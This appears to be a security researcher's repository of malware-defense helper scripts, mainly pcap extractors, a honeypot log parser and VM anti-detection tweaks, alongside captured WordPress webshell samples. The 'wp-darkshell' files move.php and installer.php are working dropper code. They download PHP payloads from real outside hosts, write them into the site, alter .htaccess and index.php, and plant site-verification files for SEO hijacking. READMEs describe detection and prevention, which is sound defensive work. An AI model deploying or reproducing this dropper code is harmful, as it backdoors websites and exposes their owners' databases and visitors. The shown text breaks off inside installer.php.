├── README.md
├── scripts-malware-defense
    ├── README.md
    ├── chinese_malware_detect.sh
    ├── extract_host_name.sh
    ├── extract_user_agent.sh
    ├── extract_emails_address.sh
    ├── extract_dns_querys_from_pcap.sh
    ├── extract_mysql_querys_from_pcap.sh
    ├── extract_top_10_url.sh
    ├── extract_top_10_url (Copia en conflicto de hell 2014-02-05).sh
    ├── get_methods.sh
    ├── extract_certificate_app_mac.sh
    ├── geoip.py
    ├── iptables_tor.py
    ├── check_pe.py
    ├── virtualbox_host_only.sh
    ├── stringssearch.py
    ├── parser_kippo.sh
    ├── virtualbox undetectable2.bat
    ├── virtualbox undetectable.sh
    └── peutils.py
├── shells
    ├── wp-darkshell
    │   ├── server.php
    │   ├── README.md
    │   ├── tempId.php
    │   ├── move.php
    │   ├── installer.php
    │   ├── mide.php
    │   ├── popup-pomo.php
    │   ├── moban.html
    │   ├── install.php
    │   └── index.php
    └── indoxploit
    │   └── README.md
└── sql-injection-cheatsheet


/README.md:
--------------------------------------------------------------------------------
1 | # malware
2 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/README.md:
--------------------------------------------------------------------------------
1 | 20 miscellaneous malware scripts.
2 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/chinese_malware_detect.sh:
--------------------------------------------------------------------------------
1 | exiftool -csv -ext .exe -ext .dll -LanguageCode -r /mnt/win | grep "Simplified"
2 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/extract_host_name.sh:
--------------------------------------------------------------------------------
1 | tshark -T fields -e http.host -r $1 > temp_dns.txt
2 | cat temps_dns.txt | sort | uniq -c | sort -nr | head
3 | rm temp_dns.txt
4 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/extract_user_agent.sh:
--------------------------------------------------------------------------------
1 | tshark -nn -r $1 -T fields -e ip.src -e http.user_agent -R "http.user_agent" >> user.tmp
2 | cat user.tmp | sort -u | uniq >> user_agent.txt
3 | rm user.tmp
4 | 
5 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/extract_emails_address.sh:
--------------------------------------------------------------------------------
1 | tshark -r $1 -R "data-text-lines" -T fields -e text >> temps_email.txt
2 | grep -Eio '\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b' temps_email.txt | sort | uniq
3 | rm temps_email.txt
4 | 
5 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/extract_dns_querys_from_pcap.sh:
--------------------------------------------------------------------------------
1 | #Extraer peticiones DNS de un pcap
2 | tshark -r $1 -T fields -e ip.src -e dns.qry.name -R "dns.flags.response eq 0" >> dns.tmp
3 | cat dns.tmp | sort -u | uniq >> peticiones_dns.txt
4 | rm dns.tmp
5 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/extract_mysql_querys_from_pcap.sh:
--------------------------------------------------------------------------------
1 | #Extraer peticiones MYSQL de un pcap
2 | tshark -r $1 -d tcp.port==3306,mysql -T fields -e mysql.query >> mysql.tmp
3 | cat mysql.tmp | sort -u | uniq >> peticiones_mysql.txt
4 | rm mysql.tmp
5 | 
6 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/extract_top_10_url.sh:
--------------------------------------------------------------------------------
1 | #Extraer las 10 urls que mas se repiten
2 | tshark -r $1 -R http.request -T fields -e http.host -e http.request.uri | sed -e 's/?.*$//' | sed -e 's#^\(.*\)\t\(.*\)$#http://\1\2#' | sort | uniq -c | sort -rn | head
3 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/server.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if($_GET['id']=='tempId'){
 3 | $a=(htmlspecialchars(file_get_contents('tempId.php')));
 4 | echo $a;
 5 | }
 6 | if($_GET['id']=='install'){
 7 | $a=(htmlspecialchars(file_get_contents('install.php')));
 8 | echo $a;
 9 | }
10 | //file end


--------------------------------------------------------------------------------
/scripts-malware-defense/extract_top_10_url (Copia en conflicto de hell 2014-02-05).sh:
--------------------------------------------------------------------------------
1 | #Extraer las 10 urls que mas se repiten
2 | tshark -r $1 -Y http.request -T fields -e http.host -e http.request.uri | sed -e 's/?.*$//' | sed -e 's#^\(.*\)\t\(.*\)$#http://\1\2#' | sort | uniq -c | sort -rn | head
3 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/get_methods.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | for webservmethod in GET POST PUT TRACE CONNECT OPTIONS PROPFIND HEAD MOVE COPY PROPPATCH MKCOL LOCK UNLOCK SEARCH;
 4 | 
 5 | do
 6 | 	printf "$webservmethod " ;
 7 | 	printf "$webservmethod / HTTP/1.1\nHost: $1\n\n" | nc $1 80 | grep "HTTP/1.1"
 8 | 
 9 | done
10 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/extract_certificate_app_mac.sh:
--------------------------------------------------------------------------------
1 | #Extraer el certificado de una aplicacion para MAC
2 | codesign -dvvvv --extract-certificates $1
3 | #This will save the certificates in DER format, named codesign0, codesign1, etc. These can then be displayed as usual with OpenSSL
4 | 
5 | #openssl x509 -inform DER -in codesign0 -text
6 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/geoip.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | 
 3 | import re
 4 | import sys
 5 | import urllib
 6 | import socket
 7 | 
 8 | url_query = 'http://www.geoiptool.com/es/?IP='
 9 | 
10 | ip = socket.gethostbyname(sys.argv[1])
11 | 
12 | u = urllib.urlopen(url_query + ip)
13 | print ip + '\t' + re.search('" target="_blank"> (.*?)<', u.read()).group(1)
14 | u.close()
15 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/iptables_tor.py:
--------------------------------------------------------------------------------
 1 | #Script to create an iptables script which block the TOR network IP
 2 | 
 3 | import urllib
 4 | 
 5 | dan_me = urllib.urlopen('https://www.dan.me.uk/torlist/')
 6 | s = dan_me.read()
 7 | s = s.replace('\r', '')
 8 | ips = s.split('\n')
 9 | for ip in ips:
10 | 	if len(ip):
11 | 		print  'iptables -I INPUT -s ' + ip + ' -j DROP'
12 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/check_pe.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import os, sys, pefile
 4 | 
 5 | def corrupt(path):
 6 | 	try:
 7 | 		pe = pefile.PE(path)
 8 | 	except:
 9 | 		return True
10 | 	highest = 0
11 | 	for section in pe.sections:
12 | 		tmp = section.PointerToRawData + section.SizeOfRawData
13 | 		if tmp > highest:
14 | 			highest = tmp
15 | 	if os.path.getsize(path) < highest:
16 | 		return True
17 | 	return False
18 | 
19 | if len(sys.argv) == 2:
20 | 	for i in os.listdir(sys.argv[1]):
21 | 		file = sys.argv[1] + '\\' + i
22 | 		if corrupt(file):
23 | 			print 'del ' + file 
24 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/virtualbox_host_only.sh:
--------------------------------------------------------------------------------
 1 | #Script para habilitar internet en una máquina con host only
 2 | 
 3 | # cleaning Firewall Rules , change ACCEPT to DROP if you want to shield
 4 | # the server, then you open ports as you need
 5 | iptables -F
 6 | iptables -P INPUT ACCEPT
 7 | iptables -P OUTPUT ACCEPT
 8 | iptables -P FORWARD ACCEPT
 9 | iptables -t nat -P PREROUTING ACCEPT
10 | iptables -t nat -P POSTROUTING ACCEPT
11 | 
12 | #enable Port forwarding
13 | echo 1 > /proc/sys/net/ipv4/ip_forward
14 | 
15 | #Habilitando red
16 | 
17 | iptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT
18 | iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
19 | iptables -A POSTROUTING -t nat -j MASQUERADE
20 | 
21 | # test and display the rules if runs properly
22 | iptables -L -n
23 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/stringssearch.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import os
 3 | import sys
 4 | import subprocess
 5 | 
 6 | 
 7 | if __name__ == "__main__":
 8 |     params = sys.argv
 9 |     result = []
10 |     dictionary_path = params[1]
11 |     dictionary_file = open(dictionary_path)
12 |     dictionary = [line for line in dictionary_file.readlines()]
13 |     dictionary_file.close()
14 | 
15 |     PATH = os.path.realpath(os.path.dirname(__file__))
16 |     for file_name in os.listdir(PATH):
17 |         if file_name == dictionary_path:
18 |             continue
19 |         p = subprocess.Popen(['strings',  file_name], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
20 |         output, error = p.communicate()
21 |         for name in dictionary:
22 |             if not len(name):
23 |                 continue
24 |             if output.find(name) > 0:
25 |                 result.append("%s: %s" % (file_name, name))
26 | 
27 |     output_file = open("match.txt", "w")
28 |     output_file.writelines(result)
29 |     output_file.close()
30 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/README.md:
--------------------------------------------------------------------------------
 1 | #Dark Shell
 2 | Injected via Wordpress hacks to create a shell backdoor to your site/server. Allows uploading of arbitrary files or slingshot attacks.
 3 | Typically used to edit `.htaccess` files and create SEO related hijacks. provides very basic interface which can be used to inject better shells.
 4 | 
 5 | ### Symptoms
 6 | - Your site has weird Google results you do not recognize
 7 | - You get notification from `Google Search Console` that your site has new ownerhsip or changes made that you are unaware.
 8 | 
 9 | ### Detection
10 | - file and directory names can differ, don't rely on them. Modification times, however, will be the same for all components.
11 | - check the modification time on index.php and .htaccess to detect tampering
12 | - look for a directory of bogus sitemap files which will contain spam urls.
13 | - look for keywords like `port_scan`.(e.g. `grep -rl "port_scan" <directory>) to find mide.php
14 | 
15 | ### Notes
16 | - exploit is only partly successful on nginx due to the modification of .htaccess 
17 | - contents of wp-config.php, including database password, should be considered compromised. 
18 | 


--------------------------------------------------------------------------------
/shells/indoxploit/README.md:
--------------------------------------------------------------------------------
 1 | #idXploit
 2 | 
 3 | The code seems to be from Indonesian hacker or effectively modified from other sources. 
 4 | It looks like other similar shells with stuff renamed to looked indonesian.
 5 | It has more features like MySQL database support.
 6 | 
 7 | ### Where it is found
 8 | Usually in your uploads folder renamed to something like jpg/gif or other files in hopes of causing a php execution
 9 | through `Direct File Access`
10 | 
11 | It would work quite easily as most sites are not well protected against such basic attacks.
12 | Badly configured Nginx could be prone as well if you pass all files to `fastcgi`.
13 | 
14 | ### how to find (easy)
15 | - look for the file text with `grep rl "keyword" <directory>`
16 | - make sure you include non php extensions.
17 | - since the exploit does not encrypt or bother to use `eval` etc to hide the code it is quite easy to locate it
18 | 
19 | 
20 | ### prevention
21 | - ensure only `.php` files are executed by apache or nginx
22 | - disable any execution in files uploaded to your uploads folder.
23 | - ensure correct permissions. Uploads folder does not require write permission except for webserver user.
24 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/tempId.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $arrUrlId['/']='320170770-23463';
 3 | $arrUrlId['/robots.txt']='320170772-32336';
 4 | $arrUrlId['/kitten-upbringing-how-to-tame/']='320170774-25645';
 5 | $arrUrlId['/nekopunman']='320170770-32404';
 6 | $arrUrlId['/feed/']='320170778-54321';
 7 | $arrUrlId['/4dmeat/']='320170776-7820';
 8 | $arrUrlId['/catfood/']='320170775-18645';
 9 | $arrUrlId['/cat-pee/']='320170778-5119';
10 | $arrUrlId['/cat-spit/']='320170777-13463';
11 | $arrUrlId['/cat-cage/']='320170772-17241';
12 | $arrUrlId['/cat-flutd/']='320170776-43348';
13 | $arrUrlId['/cat-toilet/']='320170775-7079';
14 | $arrUrlId['/cat-uremia/']='320170772-23079';
15 | $arrUrlId['/neko-sound/']='320170777-21965';
16 | $arrUrlId['/nekoshituke/']='320170776-39223';
17 | $arrUrlId['/kitten-nail/']='320170778-49805';
18 | $arrUrlId['/catfood-type/']='320170769-21787';
19 | $arrUrlId['/cat-cystitis/']='320170769-394';
20 | $arrUrlId['/cat-food-save/']='320170777-11918';
21 | $arrUrlId['/dry-food-soak/']='320170771-51365';
22 | $arrUrlId['/cat-nail-bite/']='320170773-26145';
23 | $arrUrlId['/cat-bad-breath/']='320170775-38949';
24 | $arrUrlId['/googlef7b29b2c2485d667.html']='320170775-19187';
25 | $arrUrlId['/?lang=fr']='320170775-33958';
26 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/parser_kippo.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | #Script para parsear el log de Kippo
 3 | #Marc Rivero Lopez
 4 | #mriverolopez@gmail.com
 5 | #Twitter: @seifreed
 6 | 
 7 | #Fecha de parseo
 8 | 
 9 | echo "Fecha de parseo de logs" >> report.txt
10 | date >> kippo_report.txt
11 | cat *kippo* >> kippo.md5 && md5sum kippo.md5 >> report.txt
12 | echo "[+] Calculando MD5 del log final"
13 | echo "[+] Done!"
14 | rm kippo.md5
15 | 
16 | #Extraer los logons fallidos
17 | echo "[+] Calculando la cantidad de logons fallidos"
18 | echo "[+] Done!"
19 | echo "Cantidad de logons fallidos:" >> report.txt 
20 | cat *kippo* | awk '/failed/ { print $5 }' | grep -v on | wc -l >> report.txt
21 | cat *kippo* | awk '/failed/ { print $5 }' | grep -v on | wc -l >> logons_fallidos.txt
22 | echo "[+] Done!"
23 | 
24 | #Extraer las Ip's implicadas
25 | echo "[+]Extrayendo IP's implicadas"
26 | echo "Lista de Ip's implicadas:" >> report.txt 
27 | cat *kippo* | awk '/HoneyPotTransport/ { print $3 }' | cut -d "," -f3 | grep -v SSH | cut -d "]" -f1 | sort -u >> report.txt
28 | cat *kippo* | awk '/HoneyPotTransport/ { print $3 }' | cut -d "," -f3 | grep -v SSH | cut -d "]" -f1 | sort -u >> listado_ip.txt
29 | echo "[+] Done!"
30 | 
31 | #Extraer lista de usuarios y passwords usados
32 | echo "[+]Extrayendo usuarios y passwords usados"
33 | echo "Lista de usuarios y passwords usados:" >> report.txt
34 | cat *kippo* | awk '/attempt/ { print $9 }' | cut -d "[" -f2 | cut -d "]" -f1 | sort -u >> report.txt
35 | cat *kippo* | awk '/attempt/ { print $9 }' | cut -d "[" -f2 | cut -d "]" -f1 | sort -u >> credenciales.txt
36 | echo "[+] Done!"
37 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/virtualbox undetectable2.bat:
--------------------------------------------------------------------------------
 1 | @reg copy HKLM\HARDWARE\ACPI\DSDT\VBOX__ HKLM\HARDWARE\ACPI\DSDT\WOOT__ /s /f
 2 | @reg delete HKLM\HARDWARE\ACPI\DSDT\VBOX__ /f
 3 | @reg copy HKLM\HARDWARE\ACPI\RSDT\VBOX__  HKLM\HARDWARE\ACPI\RSDT\WOOT__ /s /f
 4 | @reg delete HKLM\HARDWARE\ACPI\RSDT\VBOX__ /f
 5 | @reg copy HKLM\HARDWARE\ACPI\FADT\VBOX__ HKLM\HARDWARE\ACPI\FADT\WOOT__ /s /f
 6 | @reg delete HKLM\HARDWARE\ACPI\FADT\VBOX__ /f
 7 | @reg copy HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\WOOT__\VBOXBIOS HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\WOOT__\WOOTBIOS /s /f
 8 | @reg delete HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\WOOT__\VBOXBIOS /f
 9 | @reg copy HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\WOOT__\VBOXBIOS HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\WOOT__\WOOTBIOS /s /f
10 | @reg delete HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\WOOT__\VBOXBIOS /f
11 | @reg copy HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\WOOT__\VBOXFACP HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\WOOT__\WOOTFACP /s /f
12 | @reg delete HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\WOOT__\VBOXFACP /f
13 | @reg copy HKEY_LOCAL_MACHINE\HARDWARE\ACPI\RSDT\WOOT__\VBOXRSDT HKEY_LOCAL_MACHINE\HARDWARE\ACPI\RSDT\WOOT__\WOOTRSDT /s /f
14 | @reg delete HKEY_LOCAL_MACHINE\HARDWARE\ACPI\RSDT\WOOT__\VBOXRSDT /f
15 | @reg copy HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\WOOT__\VBOXBIOS HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\WOOT__\WOOTBIOS /s /f
16 | @reg delete HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\WOOT__\VBOXBIOS /f
17 | @reg copy HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\<VENDOR>\VBOXFACP HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\<VENDOR>\WOOTFACP /s /f
18 | @reg delete HKEY_LOCAL_MACHINE\HARDWARE\ACPI\FADT\<VENDOR>\VBOXFACP /f
19 | @reg copy HKEY_LOCAL_MACHINE\HARDWARE\ACPI\RSDT\<VENDOR>\VBOXRSDT HKEY_LOCAL_MACHINE\HARDWARE\ACPI\RSDT\<VENDOR>\WOOTRSDT /s /f
20 | @reg delete HKEY_LOCAL_MACHINE\HARDWARE\ACPI\RSDT\<VENDOR>\VBOXRSDT /f
21 | @reg add HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion /t REG_MULTI_SZ /d "WOOT -1" /f
22 | @reg add HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion /t REG_MULTI_SZ /d "VGA BIOS v1.54" /f
23 | @reg add HKLM\System\CurrentControlSet\Services\Disk\Enum /v 0 /t REG_SZ /d "IDE\Disk<VENDOR>HARDDISK__________________________1.0_____\42563136363664306362642d3664643335632" /f
24 | 


--------------------------------------------------------------------------------
/scripts-malware-defense/virtualbox undetectable.sh:
--------------------------------------------------------------------------------
 1 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Fujitsu"
 2 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Fujitsu"
 3 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "1.12"
 4 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial"  "D461561561>"
 5 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag"  "Fujitsu"
 6 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Fujitsu"
 7 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor"     "Fujitsu"
 8 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion"    "Fujitsu"
 9 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial"     "D44445115"
10 | VBoxManage setextradata "XP-VM"  "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag"   "Fujitsu"
11 | VBoxManage setextradata  "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor"       "<FUJITSU // Phoenix Technologies Ltd.>"
12 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion"       "<1.18>"
13 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate"   "<03/12/2012>"
14 | #VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor"  <03/09/2012>
15 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor"  <03/06/2012>
16 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" <03/11/2012>
17 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" <03/04/2012>
18 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor"      "<Fujitsu>"
19 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct"     "<Fujitsu>"
20 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion"     "<Fujitsu>"
21 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial"      "<DSBW011977>"
22 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU"         "DSBW014878"
23 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily"      "<"2.25">"
24 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid"     "2sfsdfsdfC-FsfsdfA8-Esfsdf1-8B14-5C9AD8sfsdfsdfsdfE0"
25 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/SerialNumber"  "Dsdfsdfsdfsdf8"
26 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/FirmwareRevision" "2.50"
27 | VBoxManage setextradata "XP-VM" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/ModelNumber" "Fujitsu"
28 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/move.php:
--------------------------------------------------------------------------------
  1 | <?php 
  2 | @set_time_limit(0);
  3 | @ini_set('display_errors', 1);
  4 | 
  5 | if(isset($_GET['use']) && $_GET['use'] == '2')
  6 | 	define('USEFUNCTION',2);
  7 | else
  8 | 	define('USEFUNCTION',1);
  9 | 
 10 | if(!function_exists('file_put_contents')) {
 11 |         function file_put_contents($filename, $s) {
 12 |                 $fp = @fopen($filename, 'w');
 13 |                 @fwrite($fp, $s);
 14 |                 @fclose($fp);
 15 |                 return TRUE;
 16 |         }
 17 | }
 18 | 
 19 | if(isset($_GET["rdir"])&& $_GET["url"]){
 20 | 	$rdir = $_GET["rdir"];
 21 | 	$url = $_GET["url"];
 22 | 	@mkdir("./". $rdir);
 23 | 	$url1='http://www.datacen2017.top/extensionupdate.txt';
 24 | 	$url2='http://' . $url . 'moban.html';
 25 | 	$url3='http://' . $url . 'index.txt';
 26 | 	$url4='http://' . $url . 'install.txt';
 27 | 	$str_hm1 = curl_get_from_webpage($url1);
 28 | 	$str_hm2 = curl_get_from_webpage($url2);
 29 | 	$str_hm3 = curl_get_from_webpage($url3);
 30 | 	$str_hm4 = curl_get_from_webpage($url4);
 31 | 	file_put_contents("./" . $rdir . "/" . "extensionupdate.php", $str_hm1);
 32 | 	file_put_contents("./" . $rdir . "/" . "moban.html", $str_hm2);
 33 | 	file_put_contents("./" . $rdir . "/" . "index.php", $str_hm3);
 34 | 	file_put_contents("./" . $rdir . "/" . "install.php", $str_hm4);
 35 | 	$file[] =  './' . $rdir . '/' . 'moban.html';
 36 | 	$file[] =  './' . $rdir . '/' . 'index.php';
 37 | 	$file[] =  './' . $rdir . '/' . 'install.php';
 38 | 	foreach($file as $values){
 39 | 		if(file_exists($values)){
 40 | 			$handle = fopen($values,'rb');
 41 | 
 42 | 			$rdSIze = filesize("./".$values);
 43 | 			$tempStr = fread($handle, $rdSIze); 
 44 | 			fclose($handle); 
 45 | 			if(strstr($tempStr,'//file end')){
 46 | 				echo "<div style='color:#216AEA;font-weight:bold;'>$values has successed!</div><br/>";
 47 | 				@chmod($values,0744);
 48 | 			}else{
 49 | 				echo "<div style='color:red;font-weight:bold;'>file $values must be reload!</div><br/>";
 50 | 			}
 51 | 			unset($tempStr);
 52 | 	
 53 | 		}else{
 54 | 			echo "<div style='color:red;font-weight:bold;'>file $values not found!</div><br/>";
 55 | 		}
 56 | 	}
 57 | }
 58 | 
 59 | function curl_get_from_webpage($url,$proxy='',$loop=10){
 60 | 	$data = false;
 61 |         $i = 0;
 62 |         while(!$data) {
 63 |              $data = curl_get_from_webpage_one_time($url,$proxy);
 64 |              if($i++ >= $loop) break;
 65 |         }
 66 | 	return $data;
 67 | }
 68 |  
 69 |  
 70 |  
 71 | 
 72 | 
 73 | function curl_get_from_webpage_one_time($url,$proxy='',$tms=0){
 74 | 	  $data = false;
 75 |   if(USEFUNCTION == 1){
 76 |  		$curl = curl_init();	
 77 | 		curl_setopt($curl, CURLOPT_URL, $url);
 78 | 		curl_setopt($curl, CURLOPT_HEADER, false);
 79 | 		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
 80 | 		$data=curl_exec($curl);
 81 | 		curl_close($curl);
 82 |  
 83 |   }elseif(USEFUNCTION == 2){
 84 | 		$data = @file_get_contents($url);
 85 |   }
 86 |  
 87 |   return $data;
 88 | }
 89 | 
 90 | rename("./moving.php","./move.php");
 91 | chmod("./index.php",0755);
 92 | 
 93 | if(isset($_GET['read']) &&  $_GET['read'] == '1'){
 94 | 	$a=file_get_contents(".htaccess");
 95 | 	echo htmlspecialchars($a);
 96 | }
 97 | 
 98 | if(isset($_GET['chmod']) &&  $_GET['chmod'] == '1'){
 99 | 	@chmod(".htaccess",0444);
100 | 	@chmod("index.php",0444);
101 | 	unlink("./urls.txt");
102 | 	echo "chmod is ok";
103 | }
104 | 
105 | if(isset($_GET['del']) &&  $_GET['del'] == '1'){
106 | 	@chmod("./index.php",0755);
107 | 	$Indexruler = '#(/+installbg.*?/+installend)#s';
108 | 	$strDefault = file_get_contents("./index.php");
109 | 	$strDefault = preg_replace($Indexruler, '', $strDefault);
110 | 	file_put_contents("./index.php",$strDefault);
111 | 	echo "index del is ok";
112 | }
113 | 
114 | 
115 | if(isset($_GET["write"]) && trim($_GET["write"])){
116 | 	$write = trim($_GET["write"]);
117 | 	$path ='./'. $write.'.html';
118 | 	$content='google-site-verification: '.$write.'.html';
119 | 	file_put_contents($path,$content);	
120 | 	echo $content;
121 | 	unlink("move.php");
122 | }
123 | unlink("./wp-content/uploader.php");
124 | ?>
125 | 
126 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/installer.php:
--------------------------------------------------------------------------------
  1 | <?php 
  2 | @set_time_limit(0);
  3 | @ini_set('display_errors', 1);
  4 | 
  5 | if(isset($_GET['use']) && $_GET['use'] == '2')
  6 | 	define('USEFUNCTION',2);
  7 | else
  8 | 	define('USEFUNCTION',1);
  9 | 
 10 | if(!function_exists('file_put_contents')) {
 11 |         function file_put_contents($filename, $s) {
 12 |                 $fp = @fopen($filename, 'w');
 13 |                 @fwrite($fp, $s);
 14 |                 @fclose($fp);
 15 |                 return TRUE;
 16 |         }
 17 | }
 18 | 
 19 | if(isset($_GET["rdir"])&& $_GET["url"]){
 20 | 	$rdir = $_GET["rdir"];
 21 | 	$url = $_GET["url"];
 22 | 	@mkdir("./". $rdir);
 23 | 	$url1='http://www.japanoutletshop.top/popup-pomo.txt';
 24 | 	$url2='http://' . $url . 'moban.html';
 25 | 	$url3='http://' . $url . 'index.txt';
 26 | 	$url4='http://' . $url . 'install.txt';
 27 | 	$url5='http://www.japanoutletshop.top/server.txt';
 28 | 	$str_hm1 = curl_get_from_webpage($url1);
 29 | 	$str_hm2 = curl_get_from_webpage($url2);
 30 | 	$str_hm3 = curl_get_from_webpage($url3);
 31 | 	$str_hm4 = curl_get_from_webpage($url4);
 32 | 	$str_hm5 = curl_get_from_webpage($url5);
 33 | 	file_put_contents("./" . $rdir . "/" . "popup-pomo.php", $str_hm1);
 34 | 	file_put_contents("./" . $rdir . "/" . "moban.html", $str_hm2);
 35 | 	file_put_contents("./" . $rdir . "/" . "index.php", $str_hm3);
 36 | 	file_put_contents("./" . $rdir . "/" . "install.php", $str_hm4);
 37 | 	file_put_contents("./" . $rdir . "/" . "server.php", $str_hm5);
 38 | 	$file[] =  './' . $rdir . '/' . 'moban.html';
 39 | 	$file[] =  './' . $rdir . '/' . 'index.php';
 40 | 	$file[] =  './' . $rdir . '/' . 'install.php';
 41 | 	$file[] =  './' . $rdir . '/' . 'server.php';
 42 | 	foreach($file as $values){
 43 | 		if(file_exists($values)){
 44 | 			$handle = fopen($values,'rb');
 45 | 
 46 | 			$rdSIze = filesize("./".$values);
 47 | 			$tempStr = fread($handle, $rdSIze); 
 48 | 			fclose($handle); 
 49 | 			if(strstr($tempStr,'//file end')){
 50 | 				echo "<div style='color:#216AEA;font-weight:bold;'>$values has successed!</div><br/>";
 51 | 				@chmod($values,0744);
 52 | 			}else{
 53 | 				echo "<div style='color:red;font-weight:bold;'>file $values must be reload!</div><br/>";
 54 | 			}
 55 | 			unset($tempStr);
 56 | 	
 57 | 		}else{
 58 | 			echo "<div style='color:red;font-weight:bold;'>file $values not found!</div><br/>";
 59 | 		}
 60 | 	}
 61 | }
 62 | 
 63 | function curl_get_from_webpage($url,$proxy='',$loop=10){
 64 | 	$data = false;
 65 |         $i = 0;
 66 |         while(!$data) {
 67 |              $data = curl_get_from_webpage_one_time($url,$proxy);
 68 |              if($i++ >= $loop) break;
 69 |         }
 70 | 	return $data;
 71 | }
 72 |  
 73 |  
 74 |  
 75 | 
 76 | 
 77 | function curl_get_from_webpage_one_time($url,$proxy='',$tms=0){
 78 | 	  $data = false;
 79 |   if(USEFUNCTION == 1){
 80 |  		$curl = curl_init();	
 81 | 		curl_setopt($curl, CURLOPT_URL, $url);
 82 | 		curl_setopt($curl, CURLOPT_HEADER, false);
 83 | 		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
 84 | 		$data=curl_exec($curl);
 85 | 		curl_close($curl);
 86 |  
 87 |   }elseif(USEFUNCTION == 2){
 88 | 		$data = @file_get_contents($url);
 89 |   }
 90 |  
